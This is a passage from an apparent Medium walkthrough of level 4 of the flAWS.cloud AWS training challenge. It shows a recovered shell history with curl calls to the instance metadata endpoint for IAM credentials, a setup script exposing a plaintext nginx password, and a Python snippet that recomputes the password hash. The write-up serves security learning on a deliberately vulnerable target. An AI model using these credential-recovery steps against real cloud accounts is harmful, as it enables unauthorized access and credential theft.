flAWS.cloud Walkthrough — Level 4 — EBS Snapshot Snarfing

Level 4

aws --profile flaws ec2 describe-images
Huh, that’s weird, no images
Voila
You can see I got tripped up with the broken symlink from “sites-enabled”, but got there in the end
import passlib.hash
salt="4ed/7TEL"
passwd="nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M"
print(passlib.hash.apr_md5_crypt.hash(passwd, salt=salt))
[root@ip-172-31-32-134 ubuntu]# more .bash_history
sudo apt-get install nginx
sudo apt-get install apache2-utils
htpasswd -c /etc/nginx/.htpasswd flaws
sudo htpasswd -c /etc/nginx/.htpasswd flaws
sudo vim /etc/nginx/sites-enabled/default
vim /var/www/html/index.html
sudo vim /var/www/html/index.html
sudo service nginx restart
cat ~/.bash_history
man htpasswd
sudo htpasswd -p /etc/nginx/.htpasswd flaws
sudo /etc/nginx/.htpasswd
sudo su -
pwd
ls -al
sudo chown ubuntu:ubuntu setupNginx.sh
ls -al
find . -mtime -1
find / -mtime -1
find / -mtime -1 | grep -v var
find / -mtime -1 | grep -v var | grep -v proc | less
find / -mtime -1 | grep -v var | grep -v proc | grep -v dev
find / -mtime -1 | grep -v var | grep -v proc | grep -v dev | less
find / -mtime -1 | grep -v var | grep -v proc | grep -v dev | grep -v sys | less
find / -mtime -1 | grep -v var | grep -v proc | grep -v dev | grep -v sys | grep -v run | less
find / -mtime -1 2&>/dev/null | grep -v var | grep -v proc | grep -v dev | grep -v sys | grep -v run | less
find / -mtime -1 2&>/dev/null
find / -mtime -1
find / -mtime -1 2>/dev/null
find / -mtime -1 2>/dev/null | grep -v var | grep -v proc | grep -v dev | grep -v sys | grep -v run | less
find / -mtime -1 2>/dev/null | grep -v "^/var" | grep -v proc | grep -v dev | grep -v sys | grep -v run | less
find / -mtime -1 2>/dev/null | grep -v "/var/" | grep -v "/proc/" | grep -v "/dev/" | grep -v "/sys/" | grep -v "/run/"
find / -mtime -1 2>/dev/null | grep -v "/var/" | grep -v "/proc/" | grep -v "/dev/" | grep -v "/sys/" | grep -v "/run/" | wc
find / -type f -mtime -1 2>/dev/null | grep -v "/var/" | grep -v "/proc/" | grep -v "/dev/" | grep -v "/sys/" | grep -v "/run/" | wc
find / -type f -mtime -1 2>/dev/null | grep -v "/var/" | grep -v "/proc/" | grep -v "/dev/" | grep -v "/sys/" | grep -v "/run/" | less
pwd
cat setupNginx.sh
curl 169.254.169.254
curl http://169.254.169.254/latest/meta-data
wget http://169.254.169.254/latest/meta-data
cat meta-data
curl -XGET http://169.254.169.254/latest/meta-data
wget http://169.254.169.254/latest/meta-data/iam
cat iam
wget http://169.254.169.254/latest/meta-data/iam/info
cat info
rm info iam
ls
cat meta-data
curl http://169.254.169.254/latest/meta-data/iam/info
curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/profile/
curl http://169.254.169.254/latest/meta-data/profile
curl http://169.254.169.254/latest/user-data
curl http://169.254.169.254/iam/security-credentials/flaws
curl http://169.254.169.254/iam/security-credentials
curl http://169.254.169.254/iam/security-credentials/flaws/
curl http://169.254.169.254/iam/
wget http://169.254.169.254/iam/security-credentials/flaws
curl http://169.254.169.254/meta-data/iam/security-credentials/flaws
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/flaws
curl http://169.254.169.254/latest/meta-data/iam/security-credentials
sudo su -
su -
sudo su-
sudo su -
sudo su -
cd /var/www/html/
ls
vim index.html
cat index.html
vim index.html
sudo vim index.html
cd /var/www/html/
ls
cat index.html
cat hint.txt
cat hint2.txt
cat hint3.txt
ls
rm hint*
sudo rm hint* -f
ls
[root@ip-172-31-32-134 ubuntu]# ll
total 8
-rw-rw-r-- 1 ec2-user ec2-user 268 Feb 12 2017 meta-data
-rw-r--r-- 1 ec2-user ec2-user 72 Feb 13 2017 setupNginx.sh
[root@ip-172-31-32-134 ubuntu]# cat setupNginx.sh
htpasswd -b /etc/nginx/.htpasswd flaws nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M
[root@ip-172-31-32-134 ubuntu]#
[root@ip-172-31-32-134 ubuntu]# cat /mnt/xvdb1/var/www/html/index.html
<html>
<head>
<title>flAWS</title>
<META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
<style>
body { font-family: Andale Mono, monospace; }
</style>
</head>
<body
text="#00d000"
bgcolor="#000000"
style="max-width:800px; margin-left:auto ;margin-right:auto"
vlink="#00ff00" link="#00ff00">
<center>
<pre>
_____ _ ____ __ __ _____
| || | / || |__| |/ ___/
| __|| | | o || | | ( \_
| |_ | |___ | || | | |\__ |
| _] | || _ || ` ' |/ \ |
| | | || | | \ / \ |
|__| |_____||__|__| \_/\_/ \___|
</pre>
<h1>flAWS - Level 5</h1>
</center>
Good work getting in. This level is described at <a href="http://level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud/243f422c/">http://level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud/243f422c/</a>

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Nick Doyle

Nick Doyle

Computer Scientist. Agile Enthusiast. Past lives include Perl Hacker, Web Developer, DBA, Tech Lead, Motorcycle Instructor, Forensic Data Analyst, & Cloud Guy